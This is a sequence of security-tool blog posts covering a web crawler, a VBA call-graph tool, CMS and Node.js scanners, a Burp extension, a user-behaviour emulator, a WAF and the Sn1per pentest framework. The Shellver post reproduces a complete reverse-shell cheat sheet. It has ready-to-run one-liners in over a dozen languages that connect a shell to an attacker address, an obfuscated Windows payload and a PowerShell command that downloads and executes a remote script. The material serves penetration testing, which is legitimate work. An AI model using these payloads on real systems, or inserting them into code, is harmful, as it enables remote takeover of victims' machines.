ACHE - A Web Crawler For Domain-Specific Search

November 20, 2018, 5:11 am

≫ Next: Vba2Graph - Generate Call Graphs From VBA Code, For Easier Analysis Of Malicious Documents

≪ Previous: Faraday v3.3 - Collaborative Penetration Test and Vulnerability Management Platform

ACHE is a focused web crawler. It collects web pages that satisfy some specific criteria, e.g., pages that belong to a given domain or that contain a user-specified pattern. ACHE differs from generic crawlers in sense that it uses page classifiers to distinguish between relevant and irrelevant pages in a given domain. A page classifier can be from a simple regular expression (that matches every page that contains a specific word, for example), to a machine-learning based classification model. ACHE can also automatically learn how to prioritize links in order to efficiently locate relevant content while avoiding the retrieval of irrelevant content.

ACHE supports many features, such as:

Regular crawling of a fixed list of web sites
Discovery and crawling of new relevant web sites through automatic link prioritization
Configuration of different types of pages classifiers (machine-learning, regex, etc)
Continuous re-crawling of sitemaps to discover new pages
Indexing of crawled pages using Elasticsearch
Web interface for searching crawled pages in real-time
REST API and web-based user interface for crawler monitoring
Crawling of hidden services using TOR proxies

Documentation
More info is available on the project's documentation.

Installation
You can either build ACHE from the source code, download the executable binary using conda, or use Docker to build an image and run ACHE in a container.

Build from source with Gradle
Prerequisite: You will need to install recent version of Java (JDK 8 or latest).
To build ACHE from source, you can run the following commands in your terminal:

git clone https://github.com/ViDA-NYU/ache.git
cd ache
./gradlew installDist

which will generate an installation package under ache/build/install/. You can then make ache command available in the terminal by adding ACHE binaries to the PATH environment variable:

export ACHE_HOME="{path-to-cloned-ache-repository}/build/install/ache"
export PATH="$ACHE_HOME/bin:$PATH"

Running using Docker
Prerequisite: You will need to install a recent version of Docker. See https://docs.docker.com/engine/installation/ for details on how to install Docker for your platform.
We publish pre-built docker images on Docker Hub for each released version. You can run the latest image using:

docker run -p 8080:8080 vidanyu/ache:latest

Alternatively, you can build the image yourself and run it:

git clone https://github.com/ViDA-NYU/ache.git
cd ache
docker build -t ache .
docker run -p 8080:8080 ache

The Dockerfile exposes two data volumes so that you can mount a directory with your configuration files (at /config) and preserve the crawler stored data (at /data) after the container stops.

Download with Conda
Prerequisite: You need to have Conda package manager installed in your system.
If you use Conda, you can install ache from Anaconda Cloud by running:

conda install -c vida-nyu ache

NOTE: Only released tagged versions are published to Anaconda Cloud, so the version available through Conda may not be up-to-date. If you want to try the most recent version, please clone the repository and build from source or use the Docker version.

Running ACHE
Before starting a crawl, you need to create a configuration file named ache.yml. We provide some configuration samples in the repository's config directory that can help you to get started.
You will also need a page classifier configuration file named pageclassifier.yml. For details on how configure a page classifier, refer to the page classifiers documentation.
After you have configured a classifier, the last thing you will need is a seed file, i.e, a plain text containing one URL per line. The crawler will use these URLs to bootstrap the crawl.
Finally, you can start the crawler using the following command:

ache startCrawl -o <data-output-path> -c <config-path> -s <seed-file> -m <model-path>

where,

<configuration-path> is the path to the config directory that contains ache.yml.
<seed-file> is the seed file that contains the seed URLs.
<model-path> is the path to the model directory that contains the file pageclassifier.yml.
<data-output-path> is the path to the data output directory.

Example of running ACHE using the sample pre-trained page classifier model and the sample seeds file available in the repository:

ache startCrawl -o output -c config/sample_config -s config/sample.seeds -m config/sample_model

The crawler will run and print the logs to the console. Hit Ctrl+C at any time to stop it (it may take some time). For long crawls, you should run ACHE in background using a tool like nohup.

Data Formats
ACHE can output data in multiple formats. The data formats currently available are:

FILES (default) - raw content and metadata is stored in rolling compressed files of fixed size.
ELATICSEARCH - raw content and metadata is indexed in an ElasticSearch index.
KAFKA - pushes raw content and metadata to an Apache Kafka topic.
WARC - stores data using the standard format used by the Web Archive and Common Crawl.
FILESYSTEM_HTML - only raw page content is stored in plain text files.
FILESYSTEM_JSON - raw content and metadata is stored using JSON format in files.
FILESYSTEM_CBOR - raw content and some metadata is stored using CBOR format in files.

For more details on how to configure data formats, see the data formats documentation page.

Bug Reports and Questions
We welcome user feedback. Please submit any suggestions, questions or bug reports using the Github issue tracker.
We also have a chat room on Gitter.

Contributing
Code contributions are welcome. We use a code style derived from the Google Style Guide, but with 4 spaces for tabs. A Eclipse Formatter configuration file is available in the repository.

Contact

Aécio Santos [aecio.santos@nyu.edu]
Kien Pham [kien.pham@nyu.edu]

Download Ache

↧

Vba2Graph - Generate Call Graphs From VBA Code, For Easier Analysis Of Malicious Documents

November 20, 2018, 1:11 pm

≫ Next: CMS Scanner - Scan Wordpress, Drupal, Joomla, vBulletin Websites For Security Issues

≪ Previous: ACHE - A Web Crawler For Domain-Specific Search

A tool for security researchers, who waste their time analyzing malicious Office macros.

Generates a VBA call graph, with potential malicious keywords highlighted.

Allows for quick analysis of malicous macros, and easy understanding of the execution flow.

@MalwareCantFly

Features

Keyword highlighting
VBA Properties support
External function declarion support
Tricky macros with "_Change" execution triggers
Fancy color schemes!

Pros

Pretty fast
Works well on most malicious macros observed in the wild

Cons

Static (dynamicaly resolved calls would not be recognized)

Examples
Example 1:
Trickbot downloader - utilizes object Resize event as initial trigger, followed by TextBox_Change triggers.

Example 2:

Check out the Examples folder for more cases.

Installation

Install oletools:

https://github.com/decalage2/oletools/wiki/Install

Install Python Requirements

pip2 install -r requirements.txt

Install Graphviz

Windows
Install Graphviz msi:

https://graphviz.gitlab.io/_pages/Download/Download_windows.html

Add "dot.exe" to PATH env variable or just:

set PATH=%PATH%;C:\Program Files (x86)\Graphviz2.38\bin

Mac

brew install graphviz

Ubuntu

sudo apt-get install graphviz

Arch

sudo pacman -S graphviz

Usage

usage: vba2graph.py [-h] [-o OUTPUT] [-c {0,1,2,3}] (-i INPUT | -f FILE)

optional arguments:
  -h, --help            show this help message and exit
  -o OUTPUT, --output OUTPUT
                        output folder (default: "output")
  -c {0,1,2,3}, --colors {0,1,2,3}
                        color scheme number [0, 1, 2, 3] (default: 0 - B&W)
  -i INPUT, --input INPUT
                        olevba generated file or .bas file
  -f FILE, --file FILE  Office file with macros

Usage Examples (All Platforms)
Only Python 2 is supported:

# Generate call graph directly from an Office file with macros [tnx @doomedraven]
python2 vba2graph.py -f malicious.doc -c 2    

# Generate vba code using olevba then pipe it to vba2graph
olevba malicious.doc | python2 vba2graph.py -c 1

# Generate call graph from VBA code
python2 vba2graph.py -i vba_code.bas -o output_folder

Output
You'll get 4 folders in your output folder:

png: the actual graph image you are looking for
svg: same graph image, just in vector graphics
dot: the dot file which was used to create the graph image
bas: the VBA functions code that was recognized by the script (for debugging)

Batch Processing

Mac/Linux:
batch.sh script file is attached for running olevba and vba2graph on an input folder of malicious docs.
Deletes output dir. use with caution.

Download Vba2Graph

↧

CMS Scanner - Scan Wordpress, Drupal, Joomla, vBulletin Websites For Security Issues

November 21, 2018, 4:46 am

≫ Next: Shellver - Reverse Shell Cheat Sheet Tool

≪ Previous: Vba2Graph - Generate Call Graphs From VBA Code, For Easier Analysis Of Malicious Documents

Scan Wordpress, Drupal, Joomla, vBulletin websites for Security issues.

CMSScan provides a centralized Security Dashboard for CMS Security scans. It is powered by wpscan, droopescan, vbscan and joomscan. It supports both on demand and scheduled scans and has the ability to sent email reports.

Install

# Requires ruby, ruby-dev, gem, python3 and git
git clone https://github.com/ajinabraham/CMSScan.git
cd CMSScan
./setup.sh

Run
./run.sh

Periodic Scans
You can perform periodic CMS scans with CMSScan. You must run CMSScan server separately and configure the following before running the scheduler.py script.

# SMTP SETTINGS
SMTP_SERVER = ''
FROM_EMAIL = ''
TO_EMAIL = ''

# SERVER SETTINGS
SERVER = ''

# SCAN SITES
WORDPRESS_SITES = []
DRUPAL_SITES = []
JOOMLA_SITES = []
VBULLETIN_SITES = []

Add a cronjob

crontab -e
@weekly /usr/bin/python3 scheduler.py

Docker

Local

docker build -t cmsscan .
docker run -it -p 7070:7070 cmsscan

Prebuilt Image

docker pull opensecurity/cmsscan
docker run -it -p 7070:7070 opensecurity/cmsscan

Screenshots

Download CMSScan

↧

Shellver - Reverse Shell Cheat Sheet Tool

November 21, 2018, 1:56 pm

≫ Next: NodeJsScan - A Static Security Code Scanner For Node.js Applications

≪ Previous: CMS Scanner - Scan Wordpress, Drupal, Joomla, vBulletin Websites For Security Issues

Reverse Shell Cheat Sheet Tool

Install Note
Clone the repository:
git clone https://github.com/0xR0/shellver.git
Then go inside:
cd shellver/
Then install it:
python setup.py -i
run shellver -h or "shellver bash or perl {} python {} php {} ruby {} netcat {} xterm {} shell {} all".format (or)

Example
shellver python

shellver all

From https://github.com/swisskyrepo

Reverse Shell Methods

Reverse Shell Cheat Sheet

Bash TCP

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196

Bash UDP

Victim:
sh -i >& /dev/udp/127.0.0.1/4242 0>&1

Listener:
nc -u -lvp 4242

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'


NOTE: Windows only
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python
Linux only

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Windows only

C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

PHP

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

NOTE: Windows only
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Netcat Traditional

nc -e /bin/sh [IPADDR] [PORT]

Netcat OpenBsd

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Ncat

ncat 127.0.0.1 4444 -e /bin/bash
ncat --udp 127.0.0.1 4444 -e /bin/bash

Powershell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')

Awk

awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Lua
Linux only

lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

Windows and Linux

lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

NodeJS

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8080, "10.17.26.64", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();


or

require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')

or

-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')

Groovy - by frohoff
NOTE: Java reverse shell also work for Groovy

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Spawn TTY

/bin/sh -i

(From an interpreter)

python -c 'import pty; pty.spawn("/bin/sh")'
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')

Access shortcuts, su, nano and autocomplete in a partially tty shell /!\ OhMyZSH might break this trick, a simple sh is recommended

# in host
ctrl+z
stty raw -echo
fg

# in reverse shell
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>

(From within vi)

:!bash
:set shell=/bin/bash:shell

(From within nmap)

!sh

Thanks to

Download Shellver

↧

NodeJsScan - A Static Security Code Scanner For Node.js Applications

November 22, 2018, 4:38 am

≫ Next: ZIP File Raider - Burp Extension For ZIP File Payload Testing

≪ Previous: Shellver - Reverse Shell Cheat Sheet Tool

Static security code scanner (SAST) for Node.js applications.

Configure & Run NodeJsScan
Install Postgres and configure SQLALCHEMY_DATABASE_URI in core/settings.py

pip3 install -r requirements.txt
python3 migrate.py # Run once to create database entries required
python3 app.py # Testing Environment
gunicorn -b 0.0.0.0:9090 app:app # Production Environment

This will run NodeJsScan on http://0.0.0.0:9090
If you need to debug, set DEBUG = True in core/settings.py

NodeJsScan CLI
The command line interface (CLI) allows you to integrate NodeJsScan with DevSecOps CI/CD pipelines. The results are in JSON format. When you use CLI the results are never stored with NodeJsScan backend.

virtualenv venv -p python3
source venv/bin/activate
(venv)pip install nodejsscan
(venv)$ nodejsscan
usage: nodejsscan [-h] [-f FILE [FILE ...]] [-d DIRECTORY [DIRECTORY ...]]
                  [-o OUTPUT] [-v]

optional arguments:
  -h, --help            show this help message and exit
  -f FILE [FILE ...], --file FILE [FILE ...]
                        Node.js file(s) to scan
  -d DIRECTORY [DIRECTORY ...], --directory DIRECTORY [DIRECTORY ...]
                        Node.js source code directory/directories to scan
  -o OUTPUT, --output OUTPUT
                        Output file to save JSON report
  -v, --version         Show nodejsscan version

Python API

import core.scanner as njsscan
res_dir = njsscan.scan_dirs(['/Code/Node.Js-Security-Course'])
res_file = njsscan.scan_file(['/Code/Node.Js-Security-Course/deserialization.js'])
print(res_file)

[{'title': 'Deserialization Remote Code Injection', 'description': "User controlled data in 'unserialize()' or 'deserialize()' function can result in Object Injection or Remote Code Injection.", 'tag': 'rci', 'line': 11, 'lines': 'app.use(cookieParser())\n\napp.get(\'/\', function(req, res) {\n            if (req.cookies.profile) {\n                var str = new Buffer(req.cookies.profile, \'base64\').toString();\n                var obj = serialize.unserialize(str);\n                if (obj.username) {\n                    res.send("Hello " + escape(obj.username));\n                }\n            } else {', 'filename': 'deserialization.js', 'path': '/Users/ajin/Code/Node.Js-Security-Course/deserialization.js', 'sha2': '06f3f0ff3deed27aeb95955a17abc7722895d3538c14648af97789d8777cee50'}]

Docker

docker build -t nodejsscan .
docker run -it -p 9090:9090 nodejsscan

DockerHub

docker pull opensecurity/nodejsscan
docker run -it -p 9090:9090 opensecurity/nodejsscan:latest

NodeJsScan Web UI

Static Analysis

Download NodeJsScan

↧

ZIP File Raider - Burp Extension For ZIP File Payload Testing

November 22, 2018, 12:33 pm

≫ Next: Sheepl - Creating Realistic User Behaviour For Supporting Tradecraft Development Within Lab Environments

≪ Previous: NodeJsScan - A Static Security Code Scanner For Node.js Applications

ZIP File Raider is a Burp Suite extension for attacking web application with ZIP file upload functionality. You can easily inject Burp Scanner/Repeater payloads in ZIP content of the HTTP requests which is not feasible by default. This extension helps to automate the extraction and compression steps.

This software was created by Natsasit Jirathammanuwat during a cooperative education course at King Mongkut's University of Technology Thonburi (KMUTT).

Installation

Set up Jython standalone Jar in Extender > Options > Python Environment > "Select file...".
Add ZIP File Raider extension in Extender > Extensions > Add > CompressedPayloads.py (Extension type: Python)

How to use

Send the HTTP request with a compressed file to the ZIP File Raider
First, right click on the HTTP request with a compressed file in HTTP body and then select "Send request to ZIP File Raider extender Repeater" or Scanner.

Repeater
This Repeater tab makes it possible to edit the content of the compressed file and then repeats it to the server promptly.

Descriptions for ZIP File Raider - Repeater tab:

Files and folders pane - list of files and folders in the compressed file which is sent from the previous step (Send request to ...), select a file to edit its content.
Edit pane - edit the content of selected file in text or hex mode (press "Save" after editing one file if you want to edit multiple files in a ZIP file).
Request/Response pane - The HTTP request/response will be shown in this pane after clicking on the "Compress & Go" button.

Scanner
This Scanner tab is used for setting the §insertion point§ in the content of the ZIP file before sending it to Burp Scanner.

Descriptions for ZIP File Raider - Scanner tab:

Files and folders pane - list of files and folders in the compressed file which is sent from the previous step (Send request to ...), select a file that you want to set the §insertion points§.
Set insertion point pane - set insertion point in the content of the selected file by clicking on the "Set insertion point" button. (The insertion point will be enclosed with a pair of § symbol)
Config/Status pane - config the scanner and show the scanner status (Not Running/Running).

Author
Natsasit Jirathammanuwat

Download ZIPFileRaider

↧

Sheepl - Creating Realistic User Behaviour For Supporting Tradecraft Development Within Lab Environments

November 23, 2018, 4:43 am

≫ Next: Janusec Application Gateway - Tool Which Provides WAF, CC Attack Defense, Unified Web Administration Portal, Private Key Protection, Web Routing And Scalable Load Balancing

≪ Previous: ZIP File Raider - Burp Extension For ZIP File Payload Testing

Sheepl : Creating realistic user behaviour for supporting tradecraft development within lab environments

Introduction

There are lots of resources available online relating to how you can build AD network environments for the development of blue team and red team tradecraft. However the current solutions tend to lack one important aspect in representing real world network configurations. A network is not just a collection of static endpoints, it is a platform for communication between people.

Sheepl is a tool that aims to bridge the gap by emulating the behaviour that people normally undertake within a network environment. Using Python3 and AutoIT3 the output can be compiled into a standalone executable without any other dependancies that when executed on an Windows endpoint, executes a set of tasks randomly over a chosen time frame.

For red teamers this can serve to present those moments of opportunity to practice tradecraft. For blue teamers this supports focusing on detection of malicious activity indicators inside a sequence of benign user tasks.

Tooling

Sheepl has two modes, commandline and interactive where commandline can be used as part of a wider scripting solution and interactive allows you to build tasks in a question/response approach.

Example

python3 sheepl.py --name TBone --total_time=2h --wordfile "c:\\users\\matt\\Desktop\\matt.doc" --inputtext "content/if.txt" --cmd --cc "ipconfig /all" --cc "whoami" --cc "netstat -anto -p tcp"')

python3 sheepl.py --interactive

AutoIT3
You can download the AutoIT3 runtime and the Aut2EXE compiler here: AutoIT3 Download
The following video is an overview of Sheepl 0.1 as the beta release.

YouTube Video

Acknowledgments

The amazing AutoIT Language https://www.autoitscript.com
Jonathan Bennett for creating ^^
The amazing Python3 language https://www.python.org
Fellow Spiders for all the support

Download Sheepl

↧

Janusec Application Gateway - Tool Which Provides WAF, CC Attack Defense, Unified Web Administration Portal, Private Key Protection, Web Routing And Scalable Load Balancing

November 23, 2018, 12:31 pm

≫ Next: Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts

≪ Previous: Sheepl - Creating Realistic User Behaviour For Supporting Tradecraft Development Within Lab Environments

Janusec Application Gateway, an application security solutions which provides WAF (Web Application Firewall), unified web administration portal, private key protection, web routing and scalable load balancing. With Janusec, you can build secure and scalable applications.

Key Features

WAF (Web Application Firewall), block SQL Injection, Cross-site Scripting, Sensitive Data Leakage, CC Attacks etc.
Group Policy (Cooperation with Multiple Check Points)
CAPTCHA support
Unified Web Administration
HTTPS support, No Agent Required.
Certificate Protection with Private Key Encrypted Storage
Scalable Architecture, Load Balance and Multiple Nodes Support

Screenshots

SQL Injection Screenshot

Sensitive Data Leakage Screenshot

Official Web Site
https://www.janusec.com/
Detailed documentation is available at Janusec Application Gateway Documentation.

Requirements

PostgreSQL 9.3~9.6 or 10 (Required by Development and Master Node of Deployment)
CentOS/RHEL 7, Debian 9
systemd
Golang 1.9+ (Required by Development Only)

Quick Start for Deployment
https://www.janusec.com/documentation/quick-start/

Quick Start for Developer

go get -u github.com/Janusec/janusec
cd $GOPATH/src/github.com/Janusec/janusec

Edit config.json with PostgreSQL

"host": "127.0.0.1",
"port": "5432",
"user": "janusec",
"password": "123456",
"dbname": "janusec"

Janusec will encrypt the password automatically.
Then:

go build
su (switch to root)
./janusec

Web Administration

http://127.0.0.1:9080/ (The first address)

Janusec Application Gateway Configuration

Release

go build
./release.sh (Only support Linux Now)

The release package is under ./dist .

Web Administration Portal
Release directory is ./static/ , and source code is available at Janusec-Admin Github with Angular 5.

Support

Website: https://www.janusec.com/
Email: support#janusec.com
QQ Group: 776900157 , @U2 (The Author)

Download Janusec

↧

Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts

November 24, 2018, 4:43 am

≫ Next: WPScan v3.4.0 - Black Box WordPress Vulnerability Scanner

≪ Previous: Janusec Application Gateway - Tool Which Provides WAF, CC Attack Defense, Unified Web Administration Portal, Private Key Protection, Web Routing And Scalable Load Balancing

Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.

SN1PER PROFESSIONAL FEATURES:

Professional reporting interface

Slideshow for all gathered screenshots

Searchable and sortable DNS, IP and open port database

Categorized host reports

Quick links to online recon tools and Google hacking queries

Personalized notes field for each host

DEMO VIDEO:

SN1PER COMMUNITY FEATURES:

Automatically collects basic recon (ie. whois, ping, DNS, etc.)
Automatically launches Google hacking queries against a target domain
Automatically enumerates open ports via NMap port scanning
Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
Automatically checks for sub-domain hijacking
Automatically runs targeted NMap scripts against open ports
Automatically runs targeted Metasploit scan and exploit modules
Automatically scans all web applications for common vulnerabilities
Automatically brute forces ALL open services
Automatically test for anonymous FTP access
Automatically runs WPScan, Arachni and Nikto for all web services
Automatically enumerates NFS shares
Automatically test for anonymous LDAP access
Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities
Automatically enumerate SNMP community strings, services and users
Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067
Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers
Automatically tests for open X11 servers
Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
Performs high level enumeration of multiple hosts and subnets
Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
Automatically gathers screenshots of all web sites
Create individual workspaces to store all scan output

AUTO-PWN:

Drupal Drupalgedon2 RCE CVE-2018-7600
GPON Router RCE CVE-2018-10561
Apache Struts 2 RCE CVE-2017-5638
Apache Struts 2 RCE CVE-2017-9805
Apache Jakarta RCE CVE-2017-5638
Shellshock GNU Bash RCE CVE-2014-6271
HeartBleed OpenSSL Detection CVE-2014-0160
Default Apache Tomcat Creds CVE-2009-3843
MS Windows SMB RCE MS08-067
Webmin File Disclosure CVE-2006-3392
Anonymous FTP Access
PHPMyAdmin Backdoor RCE
PHPMyAdmin Auth Bypass
JBoss Java De-Serialization RCE's

KALI LINUX INSTALL:

./install.sh

DOCKER INSTALL:
Credits: @menzow
Docker Install: https://github.com/menzow/sn1per-docker
Docker Build: https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/
Example usage:

$ docker pull menzo/sn1per-docker
$ docker run --rm -ti menzo/sn1per-docker sniper menzo.io

USAGE:

[*] NORMAL MODE
sniper -t|--target <TARGET>

[*] NORMAL MODE + OSINT + RECON
sniper -t|--target <TARGET> -o|--osint -re|--recon

[*] STEALTH MODE + OSINT + RECON
sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon

[*] DISCOVER MODE
sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>

[*] SCAN ONLY SPECIFIC PORT
sniper -t|--target <TARGET> -m port -p|--port <portnum>

[*] FULLPORTONLY SCAN MODE
sniper -t|--target <TARGET> -fp|--fullportonly

[*] PORT SCAN MODE
sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>

[*] WEB MODE - PORT 80 + 443 ONLY!
sniper -t|--target <TARGET> -m|--mode web

[*] HTTP WEB PORT MODE
sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>

[*] HTTPS WEB PORT MODE
sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>

[*] ENABLE BRUTEFORCE
sniper -t|--target <TARGET> -b|--bruteforce

[*] AIRSTRIKE MODE
sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike

[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED
sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>

[*] ENABLE LOOT IMPORTING INTO METASPLOIT
sniper -t|--target <TARGET>

[*] LOOT REIMPORT FUNCTION
sniper -w <WORKSPACE_ALIAS> --reimport

[*] UPDATE SNIPER
sniper -u|--update

MODES:

NORMAL: Performs basic scan of targets and open ports using both active and passive checks for optimal performance.
STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.
AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
FULLPORTONLY: Performs a full detailed port scan and saves results to XML.
